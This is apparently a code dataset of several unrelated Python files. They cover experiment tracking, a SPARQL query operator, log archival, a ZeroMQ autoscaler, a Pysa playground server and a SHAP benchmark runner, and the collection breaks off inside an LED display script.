source | python |
|---|---|
session.py | import os
import atexit
import signal
import threading
from typing import Optional
from aim.sdk.legacy.session.utils import exception_resistant
from aim.sdk.legacy.deprecation_warning import deprecated
from aim.ext.resource.configs import DEFAULT_SYSTEM_TRACKING_INT
from aim.ext.resource.tracker import ResourceTracker
from aim.sdk.repo import Repo
from aim.sdk.run import Run
class Session:
sessions = {}
_are_exit_listeners_set = False
_original_sigint_handler = None
_original_sigterm_handler = None
@deprecated
def __init__(self, repo: Optional[str] = None,
experiment: Optional[str] = None,
flush_frequency: int = 0, # unused
block_termination: bool = True, # unused
run: Optional[str] = None,
system_tracking_interval: Optional[int] = DEFAULT_SYSTEM_TRACKING_INT):
self._repo = Repo.from_path(repo) if repo else Repo.default_repo()
self._repo_path = self._repo.path
self._run = Run(run, repo=self._repo, experiment=experiment,
system_tracking_interval=system_tracking_interval)
self._run_hash = self._run.hashname
self.active = True
Session.sessions.setdefault(self._repo_path, [])
Session.sessions[self._repo_path].append(self)
# Bind signal listeners
self._set_exit_handlers()
@property
def run_hash(self):
return self._run_hash
@property
def repo_path(self):
return self._repo_path
@exception_resistant
def track(self, *args, **kwargs):
val = args[0]
name = kwargs.pop('name')
step = kwargs.pop('step', None)
epoch = kwargs.pop('epoch', None)
        for key in list(kwargs.keys()):  # copy keys: deleting while iterating raises RuntimeError
            if key.startswith('__'):
                del kwargs[key]
self._run.track(val, name=name, step=step, epoch=epoch, context=kwargs)
@exception_resistant
def set_params(self, params: dict, name: Optional[str] = None):
if name is None:
self._run[...] = params
else:
self._run[name] = params
def flush(self):
pass
@exception_resistant
def close(self):
if not self.active:
raise Exception('session is closed')
if self._run:
del self._run
self._run = None
if self._repo_path in Session.sessions \
and self in Session.sessions[self._repo_path]:
Session.sessions[self._repo_path].remove(self)
if len(Session.sessions[self._repo_path]) == 0:
del Session.sessions[self._repo_path]
self.active = False
@classmethod
def _close_sessions(cls, *args, **kwargs):
threads = []
for _, sessions in cls.sessions.items():
for session in sessions:
th = threading.Thread(target=session.close)
th.daemon = True
threads.append(th)
for th in threads:
th.start()
for th in threads:
th.join()
        if len(args):
            if args[0] == signal.SIGTERM:
                signal.signal(signal.SIGTERM, cls._original_sigterm_handler)
                os.kill(os.getpid(), signal.SIGTERM)
# elif args[0] == 2:
# signal.signal(signal.SIGINT, cls._original_sigint_handler)
# os.kill(os.getpid(), 2)
@classmethod
def _set_exit_handlers(cls):
if not cls._are_exit_listeners_set:
cls._are_exit_listeners_set = True
# cls._original_sigint_handler = signal.getsignal(signal.SIGINT)
cls._original_sigterm_handler = signal.getsignal(signal.SIGTERM)
atexit.register(cls._close_sessions)
# signal.signal(signal.SIGINT, cls._close_sessions)
signal.signal(signal.SIGTERM, cls._close_sessions)
DefaultSession = Session
def get_default_session() -> Session:
if len(Session.sessions.keys()) > 0:
default_sess_key = list(Session.sessions.keys())[0]
if len(Session.sessions[default_sess_key]) > 0:
return Session.sessions[default_sess_key][0]
# Create and return default session otherwise
return DefaultSession()
|
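A minimal usage sketch of the legacy Session API above, assuming a writable Aim repo; the repo path, metric name, and context values are illustrative.

sess = Session(repo='./aim_repo', experiment='baseline')   # illustrative repo path
sess.set_params({'lr': 0.001, 'batch_size': 32}, name='hparams')
for step in range(3):
    # extra keyword args (here `subset`) become the tracking context
    sess.track(0.5 / (step + 1), name='loss', step=step, epoch=0, subset='train')
sess.close()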
dependent_operator.py | from multiprocessing import Process, Queue
from nlde.engine.contact_source import contact_source, contact_source_bindings
from nlde.operators.operatorstructures import Tuple
from nlde.query import TriplePattern, Argument
from time import time
class DependentOperator(object):
"""
Implements a plan leaf that is resolved by a dependent physical operator.
The execute() method reads tuples from the input queue and
place them in the output queue.
"""
def __init__(self, sources, server, query, sources_desc, variables=None, res=0):
if variables is None:
variables = []
self.server = server
if isinstance(sources, int):
self.sources = {sources: set([str(var) for var in variables])}
else:
self.sources = sources
self.sources_desc = sources_desc
self.query = query
self.vars = set(variables)
self.join_vars = set(variables)
self.total_res = res
self.height = 0
self.p = None
self.cost = None
    def __str__(self):
        return "Dependent: {} ({} @ {})".format(
            self.query, self.cardinality,
            ",".join("({}: {})".format(source, value)
                     for source, value in self.query.sources.items()))
@property
def variables_dict(self):
return self.query.variables_dict
@property
def cardinality(self):
return self.query.cardinality
@property
def selectivity(self):
return self.query.selectivity
def compute_cost(self, cost_model):
cost_function = cost_model[type(self)]
self.cost = cost_function(self)
return self.cost
    def execute(self, variables, instances, outputqueue, ldf_server=None, p_list=None):
#self.q = Queue()
# Make instances a list, if not yet
if not isinstance(instances, list):
instances = [instances]
# If pre-selection of ldf servers exists
if ldf_server:
ldf_servers = [ldf_server]
else:
ldf_servers = self.query.sources
# Create process to contact sources.
aux_queue = Queue()
#self.p = Process(target=contact_source_bindings, args=(ldf_servers, self.query, aux_queue, instances,
# list(variables)))
#print ldf_servers, self.query, self.query.sources, instances, variables
contact_source_bindings(ldf_servers, self.query, aux_queue, instances, list(variables))
#self.p.start()
        sources = list(self.sources.keys())
        if p_list and self.p:  # self.p is None here: the Process creation above is commented out
            p_list.put(self.p.pid)
        # Ready and done vectors.
        ready = self.sources_desc[sources[0]]
done = 0
# Get answers from the sources.
data = aux_queue.get(True)
while data != "EOF":
# TODO: Check why this is needed.
#data.update(inst)
# Create tuple and put it in output queue.
outputqueue.put(Tuple(data, ready, done, sources))
# Get next answer.
data = aux_queue.get(True)
# Close the queue
aux_queue.close()
#self.p.terminate()
outputqueue.put(Tuple("EOF", ready, done, sources))
def execute_old(self, variables, instances, outputqueue ,p_list=None):
self.q = Queue()
# Copy the query array and obtain variables.
query = [self.query.subject.value, self.query.predicate.value, self.query.object.value]
variables = list(variables)
# Instantiate variables in the query.
inst = {}
for i in variables:
inst.update({i: instances[i]})
#inst_aux = str(instances[i]).replace(" ", "%%%")
# Remove the %%% replacement as it does not work with the current LDF Server implementation
inst_aux = str(instances[i])
for j in (0, 1, 2):
if query[j] == "?" + i:
query[j] = inst_aux
tp = TriplePattern(Argument(query[0]), Argument(query[1]), Argument(query[2]))
tp.sources = self.query.sources
        # We need to handle the case that all variables are instantiated
vars = None
if tp.variable_position == 0:
vars = self.query.variables_dict
# Create process to contact sources.
aux_queue = Queue()
self.p = Process(target=contact_source, args=(self.query.sources, tp, aux_queue, vars))
self.p.start()
        sources = list(self.sources.keys())
if p_list:
p_list.put(self.p.pid)
# Ready and done vectors.
        ready = self.sources_desc[sources[0]]
done = 0
# Get answers from the sources.
data = aux_queue.get(True)
while data != "EOF":
# TODO: Check why this is needed.
data.update(inst)
# Create tuple and put it in output queue.
outputqueue.put(Tuple(data, ready, done, sources))
# Get next answer.
data = aux_queue.get(True)
# Close the queue
aux_queue.close()
self.p.terminate()
outputqueue.put(Tuple("EOF", ready, done, sources)) |
LogCycle.py | import threading
from pymongo import MongoClient
import datetime, time
from os import listdir
from os.path import isfile, join
class LogCycleDaemon:
def __init__(self):
super(LogCycleDaemon, self).__init__()
self.thread_stop_flag = True
self.MONGO_URL = "localhost"
self.MONGO_PORT = 27017
self.MONGO_DB = "LogNotifier"
self.MONGO_COLLECTION = "alert_log"
self.NO_OF_DAYS_LOG_CYCLE = 15
self.SLEEPER = 43200 # every 12 hrs
self.DATA_SIZE = 1000
self._PATH = './zarchive/'
def run(self):
t1 = threading.Thread(target=self.job, name='Thread-log-archival', args=())
t1.start()
def job(self):
while self.thread_stop_flag:
d = datetime.datetime.now() - datetime.timedelta(days=self.NO_OF_DAYS_LOG_CYCLE)
cnt = self.getLogCountBeforeDays(d)
if cnt > 0:
print("Archiving...")
self.archiveLogs(d)
print("Done archiving...")
print("Cleaning db...")
self.deleteArchivedLogs(d)
print("Done...")
time.sleep(self.SLEEPER)
def getLogCountBeforeDays(self, date):
con = MongoClient(self.MONGO_URL, self.MONGO_PORT)
db = con[self.MONGO_DB][self.MONGO_COLLECTION]
        cnt = db.count_documents({"datetimestamp": {'$lt': date}})  # Cursor.count() was removed in pymongo 4
con.close()
return cnt
def logDataForArchival(self, d):
con = MongoClient(self.MONGO_URL, self.MONGO_PORT)
db = con[self.MONGO_DB][self.MONGO_COLLECTION]
cur = db.find({"datetimestamp": {'$lt': d}}).sort("datetimestamp", -1)
d = list(cur)
con.close()
return d
def getLastFile(self):
path = self._PATH
fileslist = [f for f in listdir(path) if isfile(join(path, f))]
lastIndex = 0
for f in fileslist:
tmp = f[f.index("_") + 1:f.index(".txt")]
if int(tmp) > lastIndex:
lastIndex = int(tmp)
return lastIndex + 1
def deleteArchivedLogs(self, d):
con = MongoClient(self.MONGO_URL, self.MONGO_PORT)
db = con[self.MONGO_DB][self.MONGO_COLLECTION]
db.delete_many({"datetimestamp": {'$lt': d}})
con.close()
def archiveLogs(self, d):
logdata = self.logDataForArchival(d)
newCnt = self.getLastFile()
curCnt = 1
f = open(self._PATH + "log_" + str(newCnt) + ".txt", "a")
for l in logdata:
if curCnt == 100:
curCnt = 1
f.close()
newCnt += 1
f = open(self._PATH + "log_" + str(newCnt) + ".txt", "a")
f.write(str(l) + "\n")
curCnt += 1
f.close()
if __name__ == '__main__':
d = LogCycleDaemon()
d.run()
|
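The daemon's thresholds are plain instance attributes, so retention and polling can be tuned before starting it; the values below are illustrative.

daemon = LogCycleDaemon()
daemon.NO_OF_DAYS_LOG_CYCLE = 7   # archive anything older than a week
daemon.SLEEPER = 3600             # poll hourly instead of every 12 hours
daemon.run()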
AutoScaler.py | import zmq
import threading as thd
class AutoScaler:
def __init__(self, signalsPort, asPorts):
self.sPort = signalsPort
self.asPorts = asPorts
self.lock = thd.Lock()
self.evContext = zmq.Context()
self.evSocket = self.evContext.socket(zmq.PUB)
self.evSocket.bind("tcp://*:{}".format(signalsPort))
        self.asTableDS = {cluster: {} for cluster in asPorts}  # avoid AttributeError before setNewAutoScaling
        self.asServers = {}
        for cluster, port in asPorts.items():
self.asServers[cluster] = self._get_asServer(port, cluster)
self.asServers[cluster].start()
def pr(self, txt):
print("\tAutoscaler::{}".format(txt))
def _get_asServer(self, port, cluster):
self.pr("Creating asServer for cluster:{} on port {}".format(cluster, port))
server = thd.Thread(target=self._as_server_wrk, args=(port, cluster), daemon=True)
return server
def _as_server_wrk(self, port, cluster):
self.pr('AS@{}: Creating server on {}'.format(cluster, port))
Context = zmq.Context()
Sock = Context.socket(zmq.REP)
Sock.bind("tcp://*:{}".format(port))
        self.pr('AS@{}: Server bound.'.format(cluster))
while True:
req = Sock.recv_json()
self.pr('AS@{}: Got request: {}'.format(cluster, req))
result = self.__asServer(req, cluster)
self.pr('AS@{}: Sending response: {}'.format(cluster, result))
Sock.send_json(result)
def __asServer(self, req, cluster):
if req['msg'] != 'as?':
return {'msg':'ERR'}
item = self.getNextInClusterWithPop(cluster)
if item is None:
return {'msg':'as.', 'icIndex':-1}
return {'msg':'as.', 'icIndex':item[0], 'table':item[1]}
def setNewAutoScaling(self, asTableObj):
with self.lock:
self.asTableDS = {}
for cluster in asTableObj.keys():
self.asTableDS[cluster] = {}
clusterReq = asTableObj[cluster]
icCtr = 0
for nodesReq in clusterReq:
N = nodesReq[0]
table = nodesReq[1]
for _ in range(N):
self.asTableDS[cluster][icCtr] = table
icCtr += 1
self.evSocket.send_json({'as':'ev_newAs'})
def getNextInClusterWithPop(self, cluster):
with self.lock:
if len(self.asTableDS[cluster]) == 0:
return None
else:
ret = self.asTableDS[cluster].popitem()
if len(self.asTableDS[cluster]) == 0:
print('AS@{}: Cluster completely scaled.'.format(cluster))
return ret
|
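A minimal sketch of driving AutoScaler above: publish a scaling table, then request a slot over the per-cluster REP socket. Ports and the table payload are illustrative.

import zmq

scaler = AutoScaler(signalsPort=5550, asPorts={"clusterA": 5551})
scaler.setNewAutoScaling({"clusterA": [(2, {"image": "worker:v1"})]})  # 2 instances

ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)
sock.connect("tcp://localhost:5551")
sock.send_json({"msg": "as?"})
print(sock.recv_json())  # e.g. {'msg': 'as.', 'icIndex': 1, 'table': {...}}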
application.py | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import argparse
import json
import logging
import os
import subprocess
import tempfile
import threading
from pathlib import Path
from typing import IO, List
from flask import Flask, request, jsonify
from flask_cors import CORS
from flask_socketio import SocketIO, emit
logging.basicConfig(
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.DEBUG,
)
LOG: logging.Logger = logging.getLogger(__name__)
CUSTOM_PYSA_MODEL_FILE: str = "custom.pysa"
WATCHMAN_CONFIG_FILE: str = ".watchmanconfig"
PYRE_CONFIG_FILE: str = ".pyre_configuration"
INPUT_FILE: str = "input.py"
def _consume(stream: IO[str]) -> str:
buffer: List[str] = []
    def _consume_lines() -> None:  # renamed: avoid shadowing the enclosing _consume
while True:
line = stream.readline()
if line:
decoded = line.strip()
LOG.debug(decoded)
buffer.append(decoded)
else:
break
    thread = threading.Thread(target=_consume_lines)
thread.start()
thread.join()
return "\n".join(buffer)
class Pyre:
def __init__(self) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Starting server in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
LOG.debug("Writing watchman configuration")
watchman_configuration_path = self._directory / WATCHMAN_CONFIG_FILE
watchman_configuration_path.write_text("{}\n")
LOG.debug("Starting watchman")
subprocess.check_call(["watchman", "watch", str(self._directory)])
LOG.debug("Priming the server")
# TODO(T82114844): incremental is borked on Ubuntu 20.04.
subprocess.check_call(
["pyre", "--noninteractive", "check"], cwd=self._directory
)
def check(self, input: str) -> str:
LOG.debug("Running pyre check")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
# TODO(T82114844): incremental is borked on Ubuntu 20.04.
with subprocess.Popen(
["pyre", "--output=json", "--noninteractive", "check"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stderr = _consume(process.stderr)
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stdout = _consume(process.stdout)
return_code = process.wait()
if return_code > 1:
LOG.error(f"Returning error: {stderr}")
result = jsonify(errors=[stderr])
else:
errors = json.loads(stdout)
result = jsonify(data={"errors": errors, "stderr": stderr})
return result
class Pysa:
def __init__(
self, input: str, model: str = "", use_builtin_pysa_models: bool = False
) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
self._stubs: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Intializing Pysa in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
"taint_models_path": [
str(self._stubs),
os.environ["PYSA_PLAYGROUND_TAINT_MODELS"],
]
if use_builtin_pysa_models
else str(self._stubs),
"search_path": [str(self._stubs), os.environ["PYSA_PLAYGROUND_STUBS"]],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
if model:
LOG.debug("Writing custom model to pysa file")
model_path = self._stubs / CUSTOM_PYSA_MODEL_FILE
model_path.write_text(model)
LOG.debug(f"Writing code:\n{input}")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
def analyze(self) -> None:
LOG.debug("Running pysa")
with subprocess.Popen(
["pyre", "-n", "analyze"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
model_verification_errors = []
            for line in iter(process.stderr.readline, ""):  # text mode: sentinel is str, not bytes
line = line.rstrip()
if line == "":
break
elif "ERROR" in line and "is not part of the environment" in line:
model_verification_errors.append(line)
elif "INFO" in line or "ERROR" in line:
if model_verification_errors:
# Emit all model verification lines together to prevent
# network overhead.
model_verification_error_output = "\n".join(
model_verification_errors
)
emit(
"pysa_results_channel",
{
"type": "output",
"line": model_verification_error_output,
},
)
LOG.debug(model_verification_error_output)
model_verification_errors = []
emit("pysa_results_channel", {"type": "output", "line": line})
LOG.debug(line)
return_code = process.wait()
if return_code != 0:
result = {"type": "finished", "result": "error"}
else:
result = {"type": "finished", "result": "ok"}
emit("pysa_results_channel", result)
application = Flask(__name__)
# You may need to modify the origin to the pyre-check website
# before deployment.
CORS(application)
socketio = SocketIO(application, cors_allowed_origins="*")
@application.route("/check", methods=["GET", "POST"])
def check() -> str:
input = (
request.args.get("input")
or request.form.get("input")
or request.json.get("input")
)
if input is None:
return jsonify(errors=["Input not provided"])
LOG.info(f"Checking `{input}`...")
pyre = Pyre()
return pyre.check(input)
@socketio.on("analyze", namespace="/analyze")
def analyze(json) -> None:
input = json.get("input", None)
use_builtin_pysa_models = json.get("use_builtin_pysa_models", False)
model = json.get("model", "")
if input is None:
emit(
"pysa_results_channel",
{
"type": "finished",
"result": "error",
"reason": "No code given to analyze.",
},
)
else:
pysa = Pysa(input, model, use_builtin_pysa_models)
LOG.info(f"Checking `{input}`...")
pysa.analyze()
@application.route("/")
def index() -> str:
return "404"
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
arguments: argparse.Namespace = parser.parse_args()
socketio.run(application, debug=arguments.debug)
|
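An illustrative client for the /check route above, assuming the app is served on localhost:5000 (the Flask default port):

import requests

resp = requests.post("http://localhost:5000/check",
                     json={"input": "x: int = 'not an int'\n"})
print(resp.json())  # {'data': {'errors': [...], 'stderr': ...}} on success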
experiments.py | from __future__ import print_function
from .. import datasets
from . import metrics
from . import models
from . import methods
from .. import __version__
import numpy as np
import sklearn
import os
import pickle
import sys
import time
import subprocess
from multiprocessing import Pool
import itertools
import copy
import random
try:
from queue import Queue
except ImportError:
from Queue import Queue
from threading import Thread, Lock
regression_metrics = [
"local_accuracy",
"consistency_guarantees",
"keep_positive_mask",
"keep_positive_resample",
#"keep_positive_impute",
"keep_negative_mask",
"keep_negative_resample",
#"keep_negative_impute",
"keep_absolute_mask__r2",
"keep_absolute_resample__r2",
#"keep_absolute_impute__r2",
"remove_positive_mask",
"remove_positive_resample",
#"remove_positive_impute",
"remove_negative_mask",
"remove_negative_resample",
#"remove_negative_impute",
"remove_absolute_mask__r2",
"remove_absolute_resample__r2",
#"remove_absolute_impute__r2"
"runtime",
]
binary_classification_metrics = [
"local_accuracy",
"consistency_guarantees",
"keep_positive_mask",
"keep_positive_resample",
#"keep_positive_impute",
"keep_negative_mask",
"keep_negative_resample",
#"keep_negative_impute",
"keep_absolute_mask__roc_auc",
"keep_absolute_resample__roc_auc",
#"keep_absolute_impute__roc_auc",
"remove_positive_mask",
"remove_positive_resample",
#"remove_positive_impute",
"remove_negative_mask",
"remove_negative_resample",
#"remove_negative_impute",
"remove_absolute_mask__roc_auc",
"remove_absolute_resample__roc_auc",
#"remove_absolute_impute__roc_auc"
"runtime",
]
human_metrics = [
"human_and_00",
"human_and_01",
"human_and_11",
"human_or_00",
"human_or_01",
"human_or_11",
"human_xor_00",
"human_xor_01",
"human_xor_11",
"human_sum_00",
"human_sum_01",
"human_sum_11"
]
linear_regress_methods = [
"linear_shap_corr",
"linear_shap_ind",
"coef",
"random",
"kernel_shap_1000_meanref",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
"lime_tabular_regression_1000"
#"sampling_shap_100"
]
linear_classify_methods = [
# NEED LIME
"linear_shap_corr",
"linear_shap_ind",
"coef",
"random",
"kernel_shap_1000_meanref",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
#"sampling_shap_100"
]
tree_regress_methods = [
# NEED tree_shap_ind
# NEED split_count?
"tree_shap_tree_path_dependent",
"tree_shap_independent_200",
"saabas",
"random",
"tree_gain",
"kernel_shap_1000_meanref",
"mean_abs_tree_shap",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
"lime_tabular_regression_1000",
"maple"
#"sampling_shap_100"
]
rf_regress_methods = [ # methods that only support random forest models
"tree_maple"
]
tree_classify_methods = [
# NEED tree_shap_ind
# NEED split_count?
"tree_shap_tree_path_dependent",
"tree_shap_independent_200",
"saabas",
"random",
"tree_gain",
"kernel_shap_1000_meanref",
"mean_abs_tree_shap",
#"kernel_shap_100_meanref",
#"sampling_shap_10000",
"sampling_shap_1000",
"lime_tabular_classification_1000",
"maple"
#"sampling_shap_100"
]
deep_regress_methods = [
"deep_shap",
"expected_gradients",
"random",
"kernel_shap_1000_meanref",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
]
deep_classify_methods = [
"deep_shap",
"expected_gradients",
"random",
"kernel_shap_1000_meanref",
"sampling_shap_1000",
#"lime_tabular_regression_1000"
]
_experiments = []
_experiments += [["corrgroups60", "lasso", m, s] for s in regression_metrics for m in linear_regress_methods]
_experiments += [["corrgroups60", "ridge", m, s] for s in regression_metrics for m in linear_regress_methods]
_experiments += [["corrgroups60", "decision_tree", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["corrgroups60", "random_forest", m, s] for s in regression_metrics for m in (tree_regress_methods + rf_regress_methods)]
_experiments += [["corrgroups60", "gbm", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["corrgroups60", "ffnn", m, s] for s in regression_metrics for m in deep_regress_methods]
_experiments += [["independentlinear60", "lasso", m, s] for s in regression_metrics for m in linear_regress_methods]
_experiments += [["independentlinear60", "ridge", m, s] for s in regression_metrics for m in linear_regress_methods]
_experiments += [["independentlinear60", "decision_tree", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["independentlinear60", "random_forest", m, s] for s in regression_metrics for m in (tree_regress_methods + rf_regress_methods)]
_experiments += [["independentlinear60", "gbm", m, s] for s in regression_metrics for m in tree_regress_methods]
_experiments += [["independentlinear60", "ffnn", m, s] for s in regression_metrics for m in deep_regress_methods]
_experiments += [["cric", "lasso", m, s] for s in binary_classification_metrics for m in linear_classify_methods]
_experiments += [["cric", "ridge", m, s] for s in binary_classification_metrics for m in linear_classify_methods]
_experiments += [["cric", "decision_tree", m, s] for s in binary_classification_metrics for m in tree_classify_methods]
_experiments += [["cric", "random_forest", m, s] for s in binary_classification_metrics for m in tree_classify_methods]
_experiments += [["cric", "gbm", m, s] for s in binary_classification_metrics for m in tree_classify_methods]
_experiments += [["cric", "ffnn", m, s] for s in binary_classification_metrics for m in deep_classify_methods]
_experiments += [["human", "decision_tree", m, s] for s in human_metrics for m in tree_regress_methods]
def experiments(dataset=None, model=None, method=None, metric=None):
for experiment in _experiments:
if dataset is not None and dataset != experiment[0]:
continue
if model is not None and model != experiment[1]:
continue
if method is not None and method != experiment[2]:
continue
if metric is not None and metric != experiment[3]:
continue
yield experiment
def run_experiment(experiment, use_cache=True, cache_dir="/tmp"):
dataset_name, model_name, method_name, metric_name = experiment
# see if we have a cached version
cache_id = __gen_cache_id(experiment)
cache_file = os.path.join(cache_dir, cache_id + ".pickle")
if use_cache and os.path.isfile(cache_file):
with open(cache_file, "rb") as f:
#print(cache_id.replace("__", " ") + " ...loaded from cache.")
return pickle.load(f)
# compute the scores
print(cache_id.replace("__", " ", 4) + " ...")
sys.stdout.flush()
start = time.time()
X,y = getattr(datasets, dataset_name)()
score = getattr(metrics, metric_name)(
X, y,
getattr(models, dataset_name+"__"+model_name),
method_name
)
print("...took %f seconds.\n" % (time.time() - start))
# cache the scores
with open(cache_file, "wb") as f:
pickle.dump(score, f)
return score
def run_experiments_helper(args):
experiment, cache_dir = args
return run_experiment(experiment, cache_dir=cache_dir)
def run_experiments(dataset=None, model=None, method=None, metric=None, cache_dir="/tmp", nworkers=1):
experiments_arr = list(experiments(dataset=dataset, model=model, method=method, metric=metric))
if nworkers == 1:
out = list(map(run_experiments_helper, zip(experiments_arr, itertools.repeat(cache_dir))))
else:
with Pool(nworkers) as pool:
out = pool.map(run_experiments_helper, zip(experiments_arr, itertools.repeat(cache_dir)))
return list(zip(experiments_arr, out))
nexperiments = 0
total_sent = 0
total_done = 0
total_failed = 0
host_records = {}
worker_lock = Lock()
ssh_conn_per_min_limit = 0 # set as an argument to run_remote_experiments
def __thread_worker(q, host):
global total_sent, total_done
hostname, python_binary = host.split(":")
while True:
# make sure we are not sending too many ssh connections to the host
# (if we send too many connections ssh thottling will lock us out)
while True:
all_clear = False
worker_lock.acquire()
try:
if hostname not in host_records:
host_records[hostname] = []
if len(host_records[hostname]) < ssh_conn_per_min_limit:
all_clear = True
elif time.time() - host_records[hostname][-ssh_conn_per_min_limit] > 61:
all_clear = True
finally:
worker_lock.release()
# if we are clear to send a new ssh connection then break
if all_clear:
break
# if we are not clear then we sleep and try again
time.sleep(5)
experiment = q.get()
# if we are not loading from the cache then we note that we have called the host
cache_dir = "/tmp"
cache_file = os.path.join(cache_dir, __gen_cache_id(experiment) + ".pickle")
if not os.path.isfile(cache_file):
worker_lock.acquire()
try:
host_records[hostname].append(time.time())
finally:
worker_lock.release()
        # record how many we have sent off for execution
worker_lock.acquire()
try:
total_sent += 1
__print_status()
finally:
worker_lock.release()
__run_remote_experiment(experiment, hostname, cache_dir=cache_dir, python_binary=python_binary)
# record how many are finished
worker_lock.acquire()
try:
total_done += 1
__print_status()
finally:
worker_lock.release()
q.task_done()
def __print_status():
print("Benchmark task %d of %d done (%d failed, %d running)" % (total_done, nexperiments, total_failed, total_sent - total_done), end="\r")
sys.stdout.flush()
def run_remote_experiments(experiments, thread_hosts, rate_limit=10):
""" Use ssh to run the experiments on remote machines in parallel.
Parameters
----------
experiments : iterable
Output of shap.benchmark.experiments(...).
thread_hosts : list of strings
Each host has the format "host_name:path_to_python_binary" and can appear multiple times
in the list (one for each parallel execution you want on that machine).
rate_limit : int
How many ssh connections we make per minute to each host (to avoid throttling issues).
"""
global ssh_conn_per_min_limit
ssh_conn_per_min_limit = rate_limit
# first we kill any remaining workers from previous runs
# note we don't check_call because pkill kills our ssh call as well
thread_hosts = copy.copy(thread_hosts)
random.shuffle(thread_hosts)
for host in set(thread_hosts):
hostname,_ = host.split(":")
try:
subprocess.run(["ssh", hostname, "pkill -f shap.benchmark.run_experiment"], timeout=15)
except subprocess.TimeoutExpired:
print("Failed to connect to", hostname, "after 15 seconds! Exiting.")
return
experiments = copy.copy(list(experiments))
random.shuffle(experiments) # this way all the hard experiments don't get put on one machine
global nexperiments, total_sent, total_done, total_failed, host_records
nexperiments = len(experiments)
total_sent = 0
total_done = 0
total_failed = 0
host_records = {}
q = Queue()
for host in thread_hosts:
worker = Thread(target=__thread_worker, args=(q, host))
        worker.daemon = True
worker.start()
for experiment in experiments:
q.put(experiment)
q.join()
def __run_remote_experiment(experiment, remote, cache_dir="/tmp", python_binary="python"):
global total_failed
dataset_name, model_name, method_name, metric_name = experiment
# see if we have a cached version
cache_id = __gen_cache_id(experiment)
cache_file = os.path.join(cache_dir, cache_id + ".pickle")
if os.path.isfile(cache_file):
with open(cache_file, "rb") as f:
return pickle.load(f)
# this is just so we don't dump everything at once on a machine
time.sleep(random.uniform(0,5))
# run the benchmark on the remote machine
#start = time.time()
cmd = "CUDA_VISIBLE_DEVICES=\"\" "+python_binary+" -c \"import shap; shap.benchmark.run_experiment(['%s', '%s', '%s', '%s'], cache_dir='%s')\" &> %s/%s.output" % (
dataset_name, model_name, method_name, metric_name, cache_dir, cache_dir, cache_id
)
try:
subprocess.check_output(["ssh", remote, cmd])
except subprocess.CalledProcessError as e:
print("The following command failed on %s:" % remote, file=sys.stderr)
print(cmd, file=sys.stderr)
total_failed += 1
print(e)
return
# copy the results back
subprocess.check_output(["scp", remote+":"+cache_file, cache_file])
if os.path.isfile(cache_file):
with open(cache_file, "rb") as f:
#print(cache_id.replace("__", " ") + " ...loaded from remote after %f seconds" % (time.time() - start))
return pickle.load(f)
else:
raise Exception("Remote benchmark call finished but no local file was found!")
def __gen_cache_id(experiment):
dataset_name, model_name, method_name, metric_name = experiment
return "v" + "__".join([__version__, dataset_name, model_name, method_name, metric_name]) |
main.py | import json
import crawlKoreaData_All as crawl1
import crawlKoreaData_Gyeonggi as crawl2
import crawlKoreaData_Seoul as crawl3
import LED_Display as LMD
import threading
from datetime import date, timedelta
today = date.today()
a = str(today)
def LED_init():
thread=threading.Thread(target=LMD.main, args=())
    thread.daemon = True
thread.start()
return
crawl1.run()
crawl2.run()
crawl3.run()
LED_init()
array_screen = [
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
